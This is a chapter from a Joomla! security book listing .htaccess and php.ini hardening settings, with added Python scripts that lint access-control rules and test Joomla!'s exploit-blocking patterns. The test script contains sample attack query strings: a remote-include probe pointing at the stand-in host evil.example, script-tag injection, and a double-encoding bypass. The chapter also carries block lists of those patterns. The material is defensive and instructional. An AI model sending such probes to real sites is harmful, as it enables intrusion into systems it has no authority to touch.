Joomla! Web Security

You're reading from Joomla! Web Security: Secure your Joomla! website from common security threats with this easy-to-use guide

Product type Paperback
Published in Oct 2008
ISBN-13 9781847194886
Length 264 pages

List of Critical Settings


The following is a list of critical settings for the .htaccess and php.ini files. The .htaccess directives below only take effect where the server's AllowOverride for that directory permits them (AuthConfig for the password rules, Limit for Order/Allow/Deny, Options for Options, FileInfo for ErrorDocument and the rewrite rules, Indexes for IndexIgnore); a directive the override does not permit is not silently ignored but produces a 500 Internal Server Error.

.htaccess

Rule one: Password-protect a single file.

# password-protect single file
<Files secure.php>
AuthType Basic
AuthName "Prompt"
AuthUserFile /home/path/.htpasswd
Require valid-user
</Files>

Keep the .htpasswd file outside the document root (the /home/path/ above stands for such a location) so it can never be served, and remember that Basic authentication sends the password in the clear unless the site runs over SSL (see the SSL rules below).

Rule two: Use FilesMatch to password-protect multiple files.

# password-protect multiple files
<FilesMatch "^(execute|index|secure|insanity|biscuit)(\..*)?$">
AuthType Basic
AuthName "Development"
AuthUserFile /home/path/.htpasswd
Require valid-user
</FilesMatch>

FilesMatch takes a regular expression matched against the file name alone. The pattern above covers those five base names with any extension; the original form of this rule, "^(execute|index|secure|insanity|biscuit)*$", matched only the bare words (and concatenations of them), so a file such as secure.php was left unprotected.

Rule three: Password-protect a directory, in this case the one containing the .htaccess file.

# password-protect the directory in which this .htaccess file resides
AuthType Basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user

Rule four: Password-protect a directory for every client except the IP addresses you list, which get in without a password.

# password-protect directory for every IP except the one specified
# place in the .htaccess file of the directory you want to protect
AuthType Basic
AuthName "Personal"
AuthUserFile /home/path/.htpasswd
Require valid-user
Order Deny,Allow
Deny from all
Allow from 99.88.77.66
Satisfy Any

The Order Deny,Allow and Deny from all lines are essential. Satisfy Any grants access when either the host check or the password check passes, and without a default deny the host check passes for everyone, so nobody is ever prompted. A variant that lets in a webmaster address and named hosts while the site is under construction:

# password prompt for visitors
AuthType Basic
AuthName "This site is currently under construction"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user
# allow the webmaster and any others open access
Order Deny,Allow
Deny from all
# the Allow from below could be your own IP to make it easier to get in
Allow from 111.222.33.4
# Allow from validator.example   (placeholder for the hostname of a validation service you rely on)
Allow from googlebot.com
Satisfy Any

Allow from with a hostname costs a double-reverse DNS lookup on every request and depends on the remote side's reverse DNS being correct; prefer IP addresses where you can. Order, Allow and Deny are the Apache 2.2 directives this book uses; Apache 2.4 replaces them with Require all denied and Require ip, combined with Require valid-user inside a <RequireAny> block.

Activate SSL via .htaccess:

# require SSL (mod_ssl directives)
SSLOptions +StrictRequire
SSLRequireSSL
SSLRequire %{HTTP_HOST} eq "domain.tld"
ErrorDocument 403 https://domain.tld

# require SSL with mod_rewrite instead of the mod_ssl directives
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [R=301,L]

The first form refuses plain-HTTP requests with 403 and the ErrorDocument sends the client to the HTTPS site; the second redirects them directly (301 rather than the default 302 so browsers remember the redirect). %{HTTPS} is "on" only when the request arrived over TLS, which still requires mod_ssl to be serving the site. Either way a redirect protects only later requests: the first plain-HTTP request, with any cookie not marked Secure, has already crossed the wire by the time the browser is told to switch.

Custom error pages and error messages:

# serve custom error pages
ErrorDocument 400 /errors/400.html
ErrorDocument 401 /errors/401.html
ErrorDocument 403 /errors/403.html
ErrorDocument 404 /errors/404.html
ErrorDocument 500 /errors/500.html

# provide a universal error document for requests that match no file or directory
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^.*$ /dir/error.php [L]

Do not combine the universal error document with Joomla!'s search-engine-friendly URL rules: they use the same two conditions to route every URL that is not a real file or directory to index.php, and whichever rule comes first takes all of those requests.
Deny access to bad robots, site rippers and offline browsers. The User-Agent header is set by the client and trivially changed, so treat this as a nuisance filter, not an access control:

# deny access to bad robots, site rippers and offline browsers
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^Anarchie [OR]
RewriteCond %{HTTP_USER_AGENT} ^ASPSeek [OR]
RewriteCond %{HTTP_USER_AGENT} ^attach [OR]
RewriteCond %{HTTP_USER_AGENT} ^autoemailspider [OR]
# ... further user agents from the chapter's list go here: one RewriteCond each, all but the last flagged [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]

Instead of answering 403, the final RewriteRule can send the matched visitor elsewhere:

# send visitor to a site of your choice
RewriteRule ^.*$ http://www.hellish-website.com [R,L]
# send the bad guys to a virtual black hole of fake email addresses
RewriteRule ^.*$ http://english-61925045732.spampoison.com [R,L]
Stop hotlinking and serve alternate content. Requests with an empty Referer are let through so that browsers and proxies that strip the header still get the images:

# stop hotlinking and serve alternate content
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain\.com/.*$ [NC]
# never rewrite the replacement image itself, or the redirect loops
RewriteCond %{REQUEST_URI} !/donotsteal\.jpg$ [NC]
RewriteRule .*\.(gif|jpg)$ http://www.domain.com/donotsteal.jpg [R,NC,L]
</IfModule>

The extra RewriteCond on REQUEST_URI is needed because the browser keeps the foreign Referer when it follows the redirect to donotsteal.jpg; without it that request is itself redirected, endlessly.
Blocking by address. These rely on the default Order Deny,Allow, under which anything not explicitly denied is allowed:

# block a partial network via network/netmask values
deny from 99.1.0.0/255.255.0.0
# block a single IP address
deny from 99.88.77.66
# block two IP addresses
deny from 99.88.77.66 11.22.33.44
# block three ranges of IP addresses (a partial address matches every host under that prefix)
deny from 99.88 99.88.77 11.22.33

In the following example, all clients are allowed access except the address 12.345.67.890 (the chapter's placeholder; real octets run 0 to 255) and hosts under domain.com:

# allow all except those indicated here
Order Allow,Deny
Allow from all
Deny from 12.345.67.890
Deny from domain.com

Two corrections to the original form of this rule. It was wrapped in <Limit GET POST PUT>, which restricts only the listed methods and leaves every other one (HEAD, OPTIONS and so on) unrestricted; access rules belong outside <Limit>, or inside <LimitExcept> if they must be scoped by method at all. And Deny from takes an IP address, a hostname or a domain suffix, not a regular expression, so ".*domain\.com.*" becomes "domain.com".

# disable directory browsing
Options -Indexes

The original read "Options All Indexes", which does the opposite: it turns on every option, directory listings included. Only the minus sign switches listings off.

# prevent viewing of a specific file
<Files secretfile.doc>
Order Allow,Deny
Deny from all
</Files>

# hide select file types from directory listings
# (IndexIgnore hides names in listings only; it does not block requests for the files themselves)
IndexIgnore *.wmv *.mp4 *.avi
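
The mistakes corrected in the fragments above (a space in Order, a regular expression handed to Deny from, an impossible IP address, Options All Indexes, a deny wrapped in <Limit>, and Satisfy Any without a default deny) are easy to reintroduce when editing .htaccess by hand, and apachectl configtest will not catch them because it never reads per-directory files. The following Python script is an added example, not code from the book, from Joomla! or from Apache: a small linter for exactly those Apache 2.2-style access-control mistakes, run over constructed fragments copied from this chapter. It understands only the handful of directives used here and is no substitute for testing against a real server.

```python
"""Lint Apache 2.2-style .htaccess access-control fragments for the mistakes
that appear in this chapter.  Added illustration, not code from the book,
Joomla! or Apache: it knows only Order, Allow/Deny from, Satisfy, Options, <Limit>."""
import re

# Constructed sample: rule four as printed in the chapter. With no Order/Deny
# directive, "Satisfy Any" lets every client in without a password.
SAMPLE_RULE_FOUR = """
AuthType Basic
AuthName "Personal"
AuthUserFile /home/path/.htpasswd
Require valid-user
Allow from 99.88.77.66
Satisfy Any
"""

# Constructed sample: the chapter's "allow all except", directory-browsing and
# secret-file fragments with their original mistakes left in.
SAMPLE_ALLOW_ALL_EXCEPT = r"""
<Limit GET POST PUT>
order allow,deny
allow from all
deny from 12.345.67.890
deny from .*domain\.com.*
</Limit>
Options All Indexes
<files secretfile.doc>
order allow, deny
deny from all
</files>
"""

# Corrected rule four plus the right Options line; the linter should be silent.
SAMPLE_FIXED = "Order Deny,Allow\nDeny from all\nAllow from 99.88.77.66\nSatisfy Any\nOptions -Indexes\n"

IPV4_OR_CIDR = re.compile(r"[\d.]+(/[\d.]+)?")
REGEX_CHARS = re.compile(r"[\\*\[\]()^$]")


def lint_htaccess(text):
    """Return a list of (line_number, message); line 0 means the whole fragment."""
    findings = []
    in_limit = False
    satisfy_any = has_allow_from = has_deny_all = order_allow_deny = False

    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        low = line.lower()

        if low.startswith("<limit "):
            in_limit = True
        elif low.startswith("</limit>"):
            in_limit = False

        # "Order Deny, Allow" is a syntax error: Order takes exactly one argument.
        if re.match(r"order\s+\w+,\s+\w+", low):
            findings.append((n, "Order takes a single argument: write Deny,Allow with no space"))
        if re.match(r"order\s+allow,deny", low):
            order_allow_deny = True

        # "Options All Indexes" switches listings on; only "-Indexes" switches them off.
        if re.match(r"options\b", low) and re.search(r"\s\+?(all|indexes)(\s|$)", low):
            findings.append((n, "Options enables directory listings here; use Options -Indexes"))

        m = re.match(r"(allow|deny)\s+from\s+(.+)", low)
        if m:
            verb, hosts = m.groups()
            if verb == "allow":
                has_allow_from = True
            elif hosts == "all":
                has_deny_all = True
            if verb == "deny" and in_limit:
                findings.append((n, "<Limit> scopes this deny to the listed methods; HEAD, OPTIONS etc. bypass it"))
            for token in hosts.split():
                if token == "all":
                    continue
                if IPV4_OR_CIDR.fullmatch(token):
                    octets = [int(o) for o in token.split("/")[0].split(".") if o]
                    if any(o > 255 for o in octets):
                        findings.append((n, f"{token} is not a valid IPv4 address: octets run 0-255"))
                elif REGEX_CHARS.search(token):
                    findings.append((n, f"{token}: Allow/Deny from takes a host or domain suffix, not a regex"))

        if low.startswith("satisfy any"):
            satisfy_any = True

    # With Satisfy Any, a client that passes the host check is never asked for a
    # password, and the host check passes everyone unless something denies by default.
    if satisfy_any and has_allow_from and not (has_deny_all or order_allow_deny):
        findings.append((0, "Satisfy Any with Allow from but no 'Deny from all' (or Order Allow,Deny): "
                            "every client passes the host check, so the password is never required"))
    return findings


if __name__ == "__main__":
    for name, sample in [("rule four", SAMPLE_RULE_FOUR), ("allow all except", SAMPLE_ALLOW_ALL_EXCEPT), ("fixed", SAMPLE_FIXED)]:
        print(f"== {name}")
        for n, msg in lint_htaccess(sample) or [(0, "no findings")]:
            print(f"  line {n}: {msg}")
```

Run as a script it prints one finding for the chapter's rule four (the Satisfy Any hole), six for the "allow all except" group, and nothing for the corrected fragment. Feed it your own .htaccess with lint_htaccess(open(path).read()).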

Make sure your .htaccess contains this entry. It is the block Joomla! ships in its htaccess.txt, and it needs RewriteEngine On once somewhere above it in the file:

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
RewriteEngine On
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to pass base64_encode(...) output via the URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in the URL (case-insensitive)
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer every matched request with 403 Forbidden ([F] makes the index.php target irrelevant)
RewriteRule ^(.*)$ index.php [F,L]
########### End - Rewrite rules to block out some common exploits

The patterns run against the raw query string before URL decoding, which is why each one spells out both the literal character and its %XX encoding. They catch the well-known probe signatures of the day rather than every variant, so they complement, and do not replace, keeping Joomla! and its extensions patched.
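
To see what this block does and does not catch, the following Python script is an added example (not code from the book or from Joomla!): it copies the five RewriteCond patterns above into Python's re module, which accepts them unchanged, and replays them against constructed query strings. The attacker host evil.example and the sample queries are made up for the illustration.

```python
"""Replay the Joomla! htaccess.txt query-string block against sample requests.
Added illustration, not code from the book or from Joomla!: the five patterns are
copied from the RewriteCond lines above and run with Python's re module, which
accepts them unchanged.  mod_rewrite tests the raw, still URL-encoded query
string, which is why the rules spell out both '<' and '%3C'."""
import re

# (pattern, carries [NC]) in the order the RewriteCond lines appear above
JOOMLA_QUERY_RULES = [
    (r"mosConfig_[a-zA-Z_]{1,21}(=|\%3D)", False),
    (r"base64_encode.*\(.*\)", False),
    (r"(\<|%3C).*script.*(\>|%3E)", True),
    (r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", False),
    (r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})", False),
]
COMPILED = [(re.compile(p, re.IGNORECASE if nc else 0), p) for p, nc in JOOMLA_QUERY_RULES]

# Constructed query strings; evil.example is a made-up attacker host.
# Second field: whether the block above should answer 403.
SAMPLE_REQUESTS = [
    # Joomla! 1.0-era remote-include probe: overwrite the config path through the URL
    ("option=com_content&mosConfig_absolute_path=http://evil.example/shell.txt?", True),
    # the same with '=' URL-encoded, which is why the rule lists %3D as an alternative
    ("mosConfig_absolute_path%3Dhttp://evil.example/x", True),
    # reflected <script> attempt with the angle brackets encoded
    ("searchword=%3Cscript%3Ealert(1)%3C/script%3E", True),
    # superglobal tampering caught by the GLOBALS and _REQUEST rules
    ("GLOBALS[mosConfig_absolute_path]=http://evil.example/", True),
    ("_REQUEST%5Boption%5D=com_content", True),
    # ordinary Joomla! requests pass, even one whose search term contains "script"
    ("option=com_content&task=view&id=12&Itemid=27", False),
    ("option=com_search&searchword=javascript+tutorial", False),
    # double-encoded brackets are not matched; PHP decodes once, so Joomla! receives
    # '%3Cscript%3E' rather than a tag, and output escaping still has to be correct
    ("searchword=%253Cscript%253Ealert(1)%253C/script%253E", False),
]


def blocking_rule(query_string):
    """Return the first pattern that fires (the request would get 403), else None.
    RewriteCond patterns are unanchored, so search() rather than match()."""
    for rx, pattern in COMPILED:
        if rx.search(query_string):
            return pattern
    return None


def audit(requests=SAMPLE_REQUESTS):
    """Return [(query, blocked, rule)] for every sample request."""
    results = []
    for query, _expected in requests:
        rule = blocking_rule(query)
        results.append((query, rule is not None, rule))
    return results


if __name__ == "__main__":
    for query, blocked, rule in audit():
        print(f"{'403' if blocked else '200'}  {query}")
        if rule:
            print(f"      matched: {rule}")
```

Only the <script> rule carries [NC]; the mosConfig rule is case-sensitive, which is harmless because PHP variable names are case-sensitive as well, so a lowercase "mosconfig_absolute_path" never reaches the variable the probe is aiming at.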

php.ini

Settings you should make in your php.ini file:

register_globals = Off

allow_url_fopen = Off

allow_url_fopen = Off stops include/require and the file functions from fetching URLs, which is what remote file inclusion relies on. PHP 5.2 and later govern the include case with a separate directive, so set allow_url_include = Off as well.

Joomla! 1.0.x also emulates register_globals in its own code; turn that off too. This line is a PHP define in Joomla!'s globals.php, not a php.ini directive:

define( 'RG_EMULATION', 0 );

Turn off PHP version information (the X-Powered-By header):

expose_php = Off

Disable file uploads (CAUTION: it may affect some extensions; anything that uploads through PHP, such as the media manager or the extension installer's package upload, stops working):

file_uploads = Off

Prevent or lower the possibility of a session fixation attack. This stops PHP from appending the session ID to URLs and form actions; pair it with session.use_only_cookies = 1 so that a session ID supplied in the query string is ignored:

session.use_trans_sid = 0

References to learn more about .htaccess and php.ini

http://shiflett.org: Chris Shiflett's site; he is the author of Essential PHP Security, a must-read.

http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks

http://articles.techrepublic.com.com/5100-22-5268948.html

http://phpsec.org/
